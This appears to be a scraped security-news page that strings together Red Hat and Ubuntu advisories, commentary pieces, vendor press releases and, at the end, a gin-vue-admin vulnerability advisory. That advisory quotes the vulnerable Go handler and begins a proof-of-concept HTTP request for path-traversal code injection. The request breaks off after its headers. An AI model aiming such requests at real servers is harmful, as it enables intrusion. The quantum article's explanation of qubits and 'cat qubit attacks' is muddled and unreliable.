Red Hat Security Advisory 2024-1856-03 - An update for opencryptoki is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1856.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: opencryptoki security updateAdvisory ID:        RHSA-2024:1856-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1856Issue date:         2024-04-16Revision:           03CVE Names:          CVE-2024-0914====================================================================Summary: An update for opencryptoki is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The opencryptoki packages contain version 2.11 of the PKCS#11 API, implemented for IBM Cryptocards, such as IBM 4764 and 4765 crypto cards. These packages includes support for the IBM 4758 Cryptographic CoProcessor (with the PKCS#11 firmware loaded), the IBM eServer Cryptographic Accelerator (FC 4960 on IBM eServer System p), the IBM Crypto Express2 (FC 0863 or FC 0870 on IBM System z), and the IBM CP Assist for Cryptographic Function (FC 3863 on IBM System z). The opencryptoki packages also bring a software token implementation that can be used without any cryptographic hardware. These packages contain the Slot Daemon (pkcsslotd) and general utilities.Security Fix(es):* opencryptoki: timing side-channel in handling of RSA PKCS#1 v1.5 padded ciphertexts (Marvin) (CVE-2024-0914)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0914References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2260407

Red Hat Security Advisory 2024-1856-03

Red Hat Security Advisory 2024-1836-03 - An update for kernel is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1836.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel security, bug fix, and enhancement update  
Advisory ID:        RHSA-2024:1836-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1836  
Issue date:         2024-04-16  
Revision:           03  
CVE Names:          CVE-2021-33631  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event's read_size (CVE-2023-6931)

* kernel: ext4: kernel bug in ext4_write_inline_data_end() (CVE-2021-33631)

Bug Fix(es):

* Performance drop on Broadcom bnxt_en nic after OCP upgrade from OCP 4.12 to OCP 4.13 (4.18.0-372.32.1.el8_6.x86_64 to 5.14.0-284.32.1.el9_2.x86_64) (JIRA:RHEL-15379)

* High latency with Matrox mgag200 (JIRA:RHEL-16558)

* [regression][ext4][xfstests generic/094] Error reading from file with invalid argument (JIRA:RHEL-25435)

* kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event's read_size (JIRA:RHEL-21646)

* xfs_growfs: XFS_IOC_FSGROWFSDATA xfsctl failed: No space left on device (RHEL9) (JIRA:RHEL-28688)

* Memory corruption when using dm-crypt or dm-verity on RHEL-9 (JIRA:RHEL-26094)

* kernel: ext4: kernel bug in ext4_write_inline_data_end() (JIRA:RHEL-26335)

Enhancement(s):

* [IBM 9.4 FEAT] Upgrade the qeth driver to latest from upstream, e.g. kernel 6.4 (JIRA:RHEL-25812)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-33631

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2252731  
https://bugzilla.redhat.com/show_bug.cgi?id=2261976

Red Hat Security Advisory 2024-1836-03

Quantum computing on the level that poses a threat to current cybersecurity measures is still years off. Here's what enterprises can do now to avoid future disruptions.

Source: DM via Adobe Stock

Quantum computing is being driven by applications that process massive calculations for big data. That includes developing new pharmaceuticals, performing financial modeling, developing next-generation communications capabilities for terrestrial and extraterrestrial applications, optimizing logistics, and running finite element analysis, as well as everyday applications in healthcare, manufacturing, and critical infrastructure.

But when the promise of quantum computing is finally realized, it will disrupt more than just high-performance computer systems (HPCSs); it will turn classical cybersecurity on its head. Today's unbreakable, hardware-based cryptography systems will be child's play for quantum computing algorithms, warn cybersecurity experts, who caution that the level of compute power from quantum computers will dwarf today's.

Here's some of what enterprise executives and board members need to consider when preparing for the upcoming migration to the new computing environment.

**What Is the Quantum Computing Threat?**

Jérémie Guillaud, chief of theory at French quantum computer manufacturer Alice & Bob, says companies should identify which systems and data eventually could be vulnerable to an attack. He suggests planning to have to defend against an attacking machine with 1 million qubits. That provides a starting point: setting a goal to migrate vulnerable systems to a quantum computer with more than 1 million qubits.

To put this in perspective, in December, IBM's Condor quantum computer had 1,121 qubits. That baseline offers organizations somewhere to start their planning. Despite the progress made in the past 15 years of quantum computing development, the threat to enterprises is likely still a decade away, Guillaud estimates.

While qubits, like classical bits, are either positive or negative, superpositioned qubits, called cat qubits, can be both positive and negative, existing in two quantum states concurrently. Today there are no defenses against a cat qubit attack, although various organizations are experimenting with new approaches.

"Things that we don't do today can have a massive impact on the future, particularly around the concept of organizations that are harvesting data today, data that's in transit, with our idea of being able to be decrypted at a later stage," says Trevor Horwitz, founder and CISO of TrustNet, a provider of managed security, consulting, and compliance services. "It's not just about the risk of things happening today; it's being able to predict what risks we're going to be facing."

The effort, commonly called "harvest now, decrypt later," makes current highly secure data not as secure in the long term as the enterprise thinks. Boards need to begin their efforts now to secure data for a future that effectively is still unknown.

**The Board's Role With Quantum Computing**

If boards wait until quantum computers are in commercial production, it will be too late to start planning network and system upgrades, which could take up to a decade to fully implement, says Lisa Edwards, executive chair of Diligent Institute, the governance think tank and global research arm of Diligent Corp.

"The way that I think about it is this has moved from being a physics problem to being an engineering problem, and it's very rapidly becoming an operations problem," she notes. "I do think it's the appropriate time for boards to start becoming more knowledgeable about it, becoming conversant about it. The role of the board is not to tell the CISO which lattice-based encryption they should use. The role of the board is to ask the question: 'What are we doing? Are we prepared if this were announced tomorrow? What would happen?'"

Tom Patterson, managing director of emerging technology security at Accenture, agrees. Corporate boards should recognize that while the threats are real, they do not need to be quantum physicists to develop defenses — although they will need to listen to those who are in order to succeed, he says.

While boards have other cybersecurity concerns, they need to start planning for the future, Patterson adds. For example, boards can require that new infrastructure device purchases, such as routers and firewalls, have quantum-resistant or upgradable firmware. Since these purchases are often already scheduled as part of network maintenance, there are no unanticipated purchases.

As Patterson notes, one major vulnerability of classical computing is that firmware is hard-coded. That means hardware needs to be replaced rather than upgraded, since the firmware is permanent. As attackers find new ways to breach systems, new approaches are needed to improve firmware.

One approach, called cryptographic agility, allows organizations to update and rewrite firmware by automatically rotating algorithms at the press of a button. Such a system was demonstrated on low-Earth orbit satellites in 2023. Crypto agility could kill the need for hardware replacements when firmware is compromised, which would make a board look smart indeed.

**About the Author(s)**

Stephen Lawton is a veteran journalist and cybersecurity subject matter expert who has been covering cybersecurity and business continuity for more than 30 years. He was named a Global Top 25 Data Expert for 2023 and a Global Top 20 Cybersecurity Expert for 2022. Stephen spent more than a decade with SC Magazine/SC Media/CyberRisk Alliance, where he served as editorial director of the content lab. Earlier he was chief editor for several national and regional award-winning publications, including MicroTimes and Digital News & Review. Stephen is the founder and senior consultant of the media and technology firm AFAB Consulting LLC. You can reach him at \[email protected\].

How Boards Can Prepare for Quantum Computers

Many teams think they're ready for a cyberattack, but events have shown that many don't have an adequate incident response plan.

Chris Crummey, Director, Executive & Board Cyber Services, Sygnia

April 16, 2024

5 Min Read

Source: Yee Xin Tan via Alamy Stock Photo

COMMENTARY

The new Securities and Exchange Commission (SEC) rules on cybersecurity risk management, strategy, governance, and incident disclosure recently went into effect, and organizational approaches to cybersecurity incident response are top of mind for stakeholders at both public and private companies. While most executive leadership teams and corporate board members assume their organizations are ready for a potential cyberattack, recent events have shown that many are ill-prepared to handle what will be their worst day on the job.

A company's response to a crisis is a direct reflection of its preparedness. Rather than focus solely on what happens during and after a cyber incident, executives and leadership teams must first understand that the period preceding an event is most critical. Organizational remediation efforts can and should be developed, tested, and implemented before an attack happens. It is imperative for those at the top to use this time to evaluate how well their teams will respond when thrust into a dire situation and take the necessary steps to ensure cyber readiness.

**Develop and Implement an Incident Response Plan**

Far too many organizations find themselves in the middle of a cyber crisis without a formal response plan in place. Companies make critical errors that can compound the financial and reputational damage associated with a cyber incident due to the simple fact they do not have established roles or responsibilities or a documented chain of command to handle this sort of situation. Within the first hour of the crisis, we see the most instances of job bias emerge and lead to a significant number of mistakes. During that "golden hour," people are unsure of what to do, but they inject themselves into the crisis because they believe it is their job to do something. This lack of understanding ultimately slows down the recovery and remediation process.

There isn't a single blueprint on what an incident response plan should look like, because each crisis is different. However, executives, board members, security teams, and others involved must know who takes the lead in responding, what each person's responsibilities are, and what steps should be taken to communicate internally and externally. The formal incident response plan should include an identified incident commander who works across lines of business and divisions within an organization to ensure each person and department understands the situation and handles their duties as assigned. The incident response commander will also be charged with contacting the company's third-party experts, such as legal, incident response firms, ransom negotiators, and public relations, to ensure they are aware of what has transpired. The cyber incident response protocol should be incorporated into the broader organizational crisis response plan, frequently reviewed and updated as necessary.

**Stress Test the Response Plan in an Active Simulation**

Planned actions can easily be lost in the chaos during a real cyberattack because of the natural psychological response employees have to a crisis. Leaders must understand that those involved in the attack will experience a rush of cortisol, the stress hormone that creates a "fog of war" during turbulent times, and it can lead to additional issues. The most common problem is the inability to validate and verify information. A person's interpretation of what has happened or what has been shared with them can differ significantly from the facts of the incident. The result can escalate a single piece of information about a potential event and turn it into a full-blown crisis.

The best way to evaluate how teams will react to a cyberattack is to put the formal incident response plan to the test. Tabletop and wargame exercises are immersive experiences, conducted in a controlled environment, that prepare enterprises to face and mitigate a potential attack. This gives every person within the organization the opportunity to feel, act, and behave as if they are in the midst of an attack situation. These training exercises allow teams to experience that rush of cortisol, learn how to handle and manage it, and develop the necessary discipline to execute the response plan. This also provides leadership with visibility into how an individual's response impacts the holistic approach to remediation.

**Evaluate the Plan's Efficacy and Improve it **

Once the organization and its cyber incident response plan have been put to the test, the next step is to evaluate the efficacy of the plan and identify opportunities for improvement. It is important to note where the fundamental breakdowns occurred and what can be done to address them. For example, if the communication cadence faltered, why was the team unable to contact the appropriate stakeholders? Was it procedural or did the incident commander not fulfill his or her duties? Leadership should know if it is a matter of committing additional resources to enhance security posture or if they need to incorporate different organizational leaders to spearhead response efforts.

Executives and board members must consider how prepared their team is before the attack happens and how it behaves during the crisis, and understand that the challenges from the wargame exercise are going present themselves when a real attack occurs. It is imperative for leadership to be involved in the evaluation process, as the final decisions will have a widespread impact on key stakeholders. The ability to comprehend how each choice impacts and improves security posture and coverage will boost employee engagement, which is paramount to successfully defending an organization.

Cybersecurity has become a board-level issue in recent years, and it must remain a priority moving forward. It is incumbent on executive leadership to be well-informed about their organization's security response plan and how people respond before, during, and after a cyber crisis. By proactively evaluating their response protocol before an attack begins, board members and executives can shore up their defenses against emerging risks and ensure cyber readiness.

**About the Author(s)**

Director, Executive & Board Cyber Services, Sygnia

Chris Crummey is the Director for Executive and Board Cyber Services globally at Sygnia. For the past eight years, Chris has prepared and advised thousands of companies, SOCs, executives and Boards of Directors on cybersecurity best practices before, during and after a cybersecurity crisis. These best practices focus on the intersection of cybersecurity, risk-based decision making, crisis communications, leadership under pressure and the role human beings play in cybersecurity. As a keynote speaker on these topics, Chris is also a cybersecurity faculty member of “Competent Boards,” which is the original and premier creator of online of ESG training programs for board directors and senior business professionals. Prior to this role, Chris was the Executive Director for the IBM’s X-Force Command Centers globally and specialized in tabletop exercises and cyber wargames.

3 Steps Executives and Boards Should Take to Ensure Cyber Readiness

Ubuntu Security Notice 6730-1 - It was discovered that Apache Maven Shared Utils did not handle double-quoted strings properly, allowing shell injection attacks. This could allow an attacker to run arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

==========================================================================  
Ubuntu Security Notice USN-6730-1  
April 11, 2024

maven-shared-utils vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- - Ubuntu 22.04 LTS  
- - Ubuntu 20.04 LTS  
- - Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- - Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- - Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

maven-shared-utils could be made to run programs if it received  
specially crafted input.

Software Description:  
- - maven-shared-utils: A collection of Maven utility classes.

Details:

It was discovered that Apache Maven Shared Utils did not handle double-quoted  
strings properly, allowing shell injection attacks. This could allow an  
attacker to run arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  libmaven-shared-utils-java      3.3.0-1ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
  libmaven-shared-utils-java      3.3.0-1ubuntu0.20.04.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  libmaven-shared-utils-java      3.3.0-1ubuntu0.18.04.1~esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
  libmaven-shared-utils-java      0.9-1ubuntu0.1~esm1

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
  libmaven-shared-utils-java      0.4-1ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6730-1  
  CVE-2022-29599

Package Information:  
  https://launchpad.net/ubuntu/+source/maven-shared-utils/3.3.0-1ubuntu0.22.04.1  
  https://launchpad.net/ubuntu/+source/maven-shared-utils/3.3.0-1ubuntu0.20.04.1  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEETB/nIDy9nvCSgAUj3gXQmO/Tr3wFAmYYcLwACgkQ3gXQmO/T  
r3yYcRAAgdreHC0o+VtyTJL/jorqqs7vKGZv4qC0XhaP69STRNtlSR4rG4I9wRqm  
BOhmBVLJylEtxfAxiWrnag5N04CBR12nr/Shk+JCm06e/5ROnu9LYiCoMowORZzy  
Nnlu82qRmCwvnL9iSWzI4wnArDehMVniOCMmWNCfpa6/UXoh1gVCjikRAWRlBOAv  
uA0KrR0cNwJ90G5wuB59zqxoUPZBf+AVCkjXYSv5WbWTvLrZbz8zhmKvc8kqu1OL  
0D05mwH5kxXuhapZ8kBqapytjP+GmuRjHFI7kk+3yhPul2J0JDcNGO99lOZ2lUfz  
IXk1S/XQTt2aEhdoanrpI6lVXcVHA0yr5I03bFEDg8D1BwZRm29KBrH2wsHdpN6J  
XWIHfaHR7kYfDVsm9kpc72b7jv/aDD66vPsI/W3A/2QttpwpjwXgZSc2Mtx/WE+T  
O5/b0jtpNrwHHYLigE2PYMPaRPjxtxhQ7qnd6FccNQl9+fOrKw9NHBAu0r5s4jlI  
cU9d47W/mdEcM3y5OuSe8lN6rtHsvnjaQxuuO5lCLKIOpohi7YyyaU5aHGXns34P  
FnImexzC8YxRvbR5ku/4ZgOAcPv9kC0wMDiC7rggqLGlhsohoca1wXG2TRIsinx5  
fRFjffvqcF6bbfyjWIKKZaM4y1QmhX3+Eth77QEqLb0InJAWDp4=  
=P4zw  
-----END PGP SIGNATURE-----

Ubuntu Security Notice USN-6730-1

PRESS RELEASE

SAN JOSE, Calif. – April 11, 2024 – Cohesity today announced a deepening of its cyber resilience collaboration with IBM. The enhanced relationship will accelerate the development of essential cyber resilience capabilities to address organizations' critical need for increased data security and resilience across hybrid cloud environments. With this announcement, Cohesity completes its Series F financing, with IBM joining NVIDIA as a strategic investor.  

The most recent Cost of a Data Breach report sponsored by IBM Security shows the global average cost of a data breach in 2023 was $4.45 million, a 15% increase over the previous three years. To help clients tackle this issue head-on, IBM has delivered Cohesity capabilities into IBM’s end-to-end cyber resilience platform, IBM Storage Defender, strengthening our customers’ ability to recover from data breaches and cyber-attacks.  

“IBM is a powerful partner in the enterprise cloud and IT infrastructure market. They bring decades of expertise to our relationship, in addition to their investment in our business to help fund incremental research and development to offer customers even stronger cyber resilience,” said Sanjay Poonen, CEO and President, Cohesity. “We’re thrilled that IBM is working with us as we continue to help combined customers detect threats rapidly and maintain operations during an attack to avoid business interruptions.”

“Data breaches continue to be one of the biggest threats organizations face to advancing business outcomes,” said Ric Lewis, SVP, Infrastructure at IBM. “We’re excited to deepen our collaboration with Cohesity to bring clients innovative end-to-end software-defined solutions designed to increase their cyber resilience and help avoid business interruptions.”

Cohesity’s collaboration with IBM has brought Cohesity DataProtect together with IBM's Storage Defender Solution to help their joint customers protect, monitor, manage, and recover data. Cohesity DataProtect is a high-performance, secured backup and recovery solution. It is designed to safeguard your data against sophisticated cyber threats and offers comprehensive policy-based protection for your cloud-native, SaaS, and traditional data sources. DataProtect converges multiple-point products into a single multicloud platform deployed on-premises or consumed as a service.

IBM Storage Defender leverages AI and event monitoring across multiple storage platforms through a single pane of glass to help protect organizations' data layer from risks like ransomware, human error, and sabotage. Additionally, IBM Storage Defender is anticipated to include a cyber vault and clean room features with automated recovery functions designed to help companies restore business-critical data in hours or minutes from what used to take days.  
Statements regarding IBM's or Cohesity’s future direction and intent are subject to change or withdrawal without notice and represent goals and objectives only.

About Cohesity  
Cohesity is a leader in AI-powered data security and management. Aided by an extensive ecosystem of partners, Cohesity makes it easier to secure, protect, manage, and get value from data – across the data center, edge, and cloud. Cohesity helps organizations defend against cybersecurity threats with comprehensive data security and management capabilities, including immutable backup snapshots, AI-based threat detection, monitoring for malicious behavior, and rapid recovery at scale. Cohesity solutions can be delivered as a service, self-managed, or provided by a Cohesity-powered partner. Cohesity is headquartered in San Jose, CA, and is trusted by the world’s largest enterprises, including 44 of the Fortune 100.

Cohesity Extends Collaboration to Strengthen Cyber Resilience With IBM Investment in Cohesity

A machine learning bill of materials (MLBOM) framework can bring transparency, auditability, control, and forensic insight into AI and ML supply chains.

Source: Cagkan Sayin via Alamy Stock Photo

COMMENTARY

The days of large, monolithic apps are withering. Today's applications rely on microservices and code reuse, which makes development easier but creates complexity when it comes to tracking and managing the components they use. 

This is why the software bill of materials (SBOM) has emerged as an indispensable tool for identifying what's in a software app, including the components, versions, and dependencies that reside within systems. SBOMs also deliver deep insights into dependencies, vulnerabilities, and risks that factor into cybersecurity.

An SBOM allows CISOs and other enterprise leaders to focus on what really matters by providing an up-to-date inventory of software components. This makes it easier to establish and enforce strong governance and spot potential problems before they spiral out of control.

Yet in the age of artificial intelligence (AI), the classic SBOM has some limitations. Emerging machine learning (ML) frameworks introduce remarkable opportunities, but they also push the envelope on risk and introduce a new asset to organizations: the machine learning model. Without strong oversight and controls over these models, an array of practical, technical, and legal problems can arise. 

That's where machine learning bills of materials (MLBOMs) enter the picture. The framework tracks names, locations, versions, and licensing for assets that comprise an ML model. It also includes overarching information about the nature of the model, training configurations embedded in metadata, who owns it, various feature sets, hardware requirements, and more.

**Why MLBOMs Matter**

CISOs are realizing that AI and ML require a different security model — and the underlying training data and models that run them are frequently not tracked or governed. An MLBOM can help an organization avoid security risks and failures. It addresses critical factors like model and data provenance, safety ratings, and dynamic changes that extend beyond the scope of SBOM.

Because ML environments are in a constant state of flux and changes can take place with little or no human interaction, issues related to data consistency — including where it originated, how it was cleaned, and how it was labeled — are a constant concern.

For example, if a business analyst or data scientist determines that a data set is poisoned, the MLBOM simplifies the task of finding all the various touch points and models that were trained with that data. 

**MLBOMs Can Elevate Protection**

Transparency, auditability, control, and forensic insight are all hallmarks of an MLBOM. With a comprehensive view of the "ingredients" that go into an ML model, an organization is equipped to manage its ML models safely.

Here are some ways to build a best practice framework around an MLBOM:

*   Recognize the need for an MLBOM: It's no secret that ML fuels business innovation and even disruption. Yet it also introduces significant risks that can extend to reputation, regulatory compliance, and legal issues. Having visibility into ML models is critically important.
    

*   Conduct essential due diligence: An MLBOM should integrate with the CI/CD pipeline and deliver a high level of clarity. Support for standard frameworks like JSON or OWASP's CycloneDX can unify SBOM and MLBOM processes.
    

*   Analyze policies, processes, and governance: It's essential to sync an MLBOM with an organization's workflows and business processes. This increases the odds that ML pipelines will work as intended, while minimizing risks related to cybersecurity, data privacy, compliance, and other risk-associated areas.
    

*   Use an MLBOM with machine learning gates: Rigorous controls and gateways lead to essential AI and ML guardrails. In this way, the business and the CSO can build on successes and harness ML to unlock greater cost savings, performance gains, and business value.
    

Machine learning is radically changing the business and IT landscape. By extending proven SBOM methodologies to ML through MLBOMs, it's possible to take a giant step toward boosting machine learning performance and protecting data and assets.

**About the Author(s)**

CISO, Protect AI

Diana Kelley is CISO for Protect AI. She was Cybersecurity Field CTO for Microsoft, Global Executive Security Advisor at IBM Security, GM at Symantec, VP at Burton Group (now Gartner), a Manager at KPMG, CTO and co-founder of SecurityCurve, and Chief vCISO at SaltCybersecurity.

Why MLBOMs Are Useful for Securing the AI/ML Supply Chain

PRESS RELEASE

NEW YORK, April 10, 2024 – Cloud security leader Wiz has announced the acquisition of New York-based startup Gem Security. With a valuation of $10 billion and $900 million raised to date, Wiz aims to add to its Cloud Native Application Protection Platform (CNAPP) with Gem's technology. The acquisition advances Wiz’s Cloud Detection and Response (CDR) capabilities, and also demonstrates Wiz’s commitment to consolidation: as organizations push to combat tool sprawl, siloes, and visibility gaps, Wiz is building the world’s go-to platform for protecting everything organizations build and run in the cloud.  

Founded in 2022, Gem transforms how organizations approach detection and response in the cloud with a real-time CDR (Cloud Detection and Response) solution that shortens the time to investigate and contain cloud-native threats. In contrast to static industry solutions lacking real-time monitoring capabilities, the company’s technology centralizes real-time visibility into multi-cloud environments and provides automated incident timelines to understand the root causes of cloud breaches. With $34 million raised to date from Team8, Notable Capital (formerly GGV Capital), IBM Ventures, Cisco Investments and Silicon Valley CISO Investments (SVCI) Gem's employees will be joining Wiz, and the company's co-founders (CEO Arie Zilberstein, CTO Ron Konigsberg, and VP Product Ofir Brukner) will join the Wiz executive team. 

This is Wiz's second acquisition since its inception in 2020, after the company acquired Raftt, a cloud-based developer collaboration platform, in December. New York-based Wiz is considered the world's fastest-growing startup, recently announcing that it has reached $350 million in ARR, with over 40% of the Fortune 100 as customers. The company previously expressed interest in pursuing M&A opportunities as part of its mission to build a holistic cloud security platform catering to a wide array of industry needs. Wiz is now targeting $1 billion in revenue, ahead of a potential Wall Street IPO. 

“Consolidation is the future of the security industry. With cloud infrastructure growing at an accelerated pace, not to mention the broad adoption of AI applications, the world’s largest organizations require consolidated, cloud-native security platforms to effectively address a wide and ever-changing range of security needs,” said Assaf Rappaport, Co-Founder and CEO, Wiz. “The acquisition of Gem brings the industry’s leading CDR to Wiz. Coupled with our CNAPP, which customers have ranked number one, we’re creating a powerful real-time solution for SOC and Cyber Defense teams to combat emerging threats and building the world’s leading cloud security platform.” 

"Since our inception two years ago, Gem has been revolutionizing the way organizations approach security operations in the cloud," said Arie Zilberstein, Co-Founder & CEO of Gem Security. "Together with Wiz, we're thrilled to deliver even more value to security operations teams around the world as part of Wiz's industry-leading platform. We look forward to joining the team and embarking on a new chapter of Gem's growth journey with Wiz." 

For more information, visit https://www.wiz.io/blog.

About Wiz

Wiz secures everything organizations build and run in the cloud. Founded in 2020, Wiz is the fastest-growing software company in the world. Wiz enables hundreds of organizations worldwide, including 40 percent of the Fortune 100, to rapidly identify and remove critical risks in cloud environments. Its customers include Salesforce, Slack, Mars, BMW, Avery Dennison, Priceline, Cushman & Wakefield, DocuSign, Plaid, and Agoda, among others. Wiz is backed by Sequoia, Index Ventures, Insight Partners, Salesforce, Blackstone, Advent, Greenoaks, Lightspeed and Aglaé. Visit https://www.wiz.io for more information.

Wiz Acquires Gem Security to Expand Cloud Detection and Response Offering

PRESS RELEASE

WEST PALM BEACH, Fla., April 08, 2024 (GLOBE NEWSWIRE) -- Veriato released their next generation Insider Risk Management (IRM) solution, re-imagined from the ground up to deliver superior insider risk management and threat detection. With organizations of all sizes facing a more complex cybersecurity environment, Veriato IRM delivers unprecedented flexibility and scalability using the power of GenAI.

Veriato's IRM solution offers best-in-class technology for companies looking to improve their threat mitigation with AI enabled predictive analytics delivering better detection and predictability. According to IBM, the average cost of a single data breach has reached $4.45 million, a record high. Organizations need a holistic view of employee behavior to get ahead of threats and to reduce their exposure and costs. The new platform provides the agility and usability that make it a must-have in the fight against increasing insider threats. Features such as predictive risk intelligence, risk scoring, baselining and PII identification offer market-leading detection capabilities that are easy to deploy and manage.

Veriato IRM delivers:

*   Unparalleled risk detection capabilities with Generative AI.
    
*   Advanced behavior pattern identification across logon events, document activity, email activity, etc.
    
*   Complex dimensional analysis, including Risk Scoring.
    
*   Comprehensive language and sentiment analysis.
    
*   Automatic PII/PHI identification with RAG pre-trained models.
    
*   Flexible and scalable microservices architecture.
    
*   Multiple deployment options – cloud, on-premise, hybrid.
    

Veriato IRM is the product of close collaboration with Veriato’s global base of customers across a number of industries including financial services, healthcare and government. Designed with a deep understanding of today’s changing workforce and the technology and data needs of today’s modern organization, Veriato IRM is the most advanced and usable solution on the market today.

“Insider Risk Management has become essential for organizations committed to protecting customer data, IP and their employee bases now that the future of work is here. From board rooms to SMBs, IRM is at the top of security agendas. Applying behavioral analytics to cyber allows leaders to get ahead of breaches instead of just reacting to them when they occur,” said Elizabeth Harz, CEO of Veriato. “We are extremely excited to build upon our history as the category creator, and provide a new layer of control, transparency, confidence and perhaps most importantly, proactivity.”

About Veriato

Veriato is reinventing the category it created, using AI-based user behavior analytics to help companies prevent risks and increase productivity in their remote, hybrid and in-office environments. Veriato’s platform offers solutions for Insider Risk Management (IRM), behavioral analytics, user activity monitoring (UAM) and data loss prevention (DLP) in a single powerful platform. Veriato delivers monitoring, salient alerts, reporting and screenshots, allowing customers to be predictive and proactive rather than reactive, critical in cybersecurity. The platform helps global Enterprises, SMBs and Government entities become more engaged, productive and secure.

You May Also Like

Veriato Launches Next Generation Insider Risk Management Solution

### Impact
"gin-vue-admin<=v2.6.1 has a code injection vulnerability in the backend. In the Plugin System -> Plugin Template feature, an attacker can perform directory traversal by manipulating the 'plugName' parameter. They can create specific folders such as 'api', 'config', 'global', 'model', 'router', 'service', and 'main.go' function within the specified traversal directory. Moreover, the Go files within these folders can have arbitrary code inserted based on a specific PoC parameter."

Affected code: https://github.com/flipped-aurora/gin-vue-admin/blob/746af378990ebf3367f8bb3d4e9684936df152e7/server/api/v1/system/sys_auto_code.go:239. Let's take a look at the method 'AutoPlug' within the 'AutoCodeApi' struct.
```go
func (autoApi *AutoCodeApi) AutoPlug(c *gin.Context) {
	var a system.AutoPlugReq
	err := c.ShouldBindJSON(&a)
	if err != nil {
		response.FailWithMessage(err.Error(), c)
		return
	}
	a.Snake = strings.ToLower(a.PlugName)
	a.NeedModel = a.HasRequest || a.HasResponse
	err = autoCodeService.CreatePlug(a)
	if err != nil {
		global.GVA_LOG.Error("预览失败!", zap.Error(err))
		response.FailWithMessage("预览失败", c)
		return
	}
	response.Ok(c)
}
```
The main reason for the existence of this vulnerability is the controllability of the PlugName field within the struct.
```go
type AutoPlugReq struct {
	PlugName    string         `json:"plugName"` // 必然大写开头
	Snake       string         `json:"snake"`    // 后端自动转为 snake
	RouterGroup string         `json:"routerGroup"`
	HasGlobal   bool           `json:"hasGlobal"`
	HasRequest  bool           `json:"hasRequest"`
	HasResponse bool           `json:"hasResponse"`
	NeedModel   bool           `json:"needModel"`
	Global      []AutoPlugInfo `json:"global,omitempty"`
	Request     []AutoPlugInfo `json:"request,omitempty"`
	Response    []AutoPlugInfo `json:"response,omitempty"`
}
```
POC：
```
POST /api/autoCode/createPlug HTTP/1.1
Host: 192.168.31.18:8080
Content-Length: 326
Accept: application/json, text/plain, */*
x-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiNzJlZWQ4OTUtYzUwOC00MDFiLWIyYzQtMTk2MWMyOTlkOWNhIiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Ik1yLuWlh-a3vCIsIkF1dGhvcml0eUlkIjo4ODgsIkJ1ZmZlclRpbWUiOjg2NDAwLCJpc3MiOiJxbVBsdXMiLCJhdWQiOlsiR1ZBIl0sImV4cCI6MTcxMjIxMTM4MywibmJmIjoxNzExNjA2NTgzfQ.uq61pJNi4kzUXb8lEkVa7NBCBvp_Ye59fee-TJV_rpE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
x-user-id: 1
Content-Type: application/json
Origin: http://192.168.31.18:8080
Referer: http://192.168.31.18:8080/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6
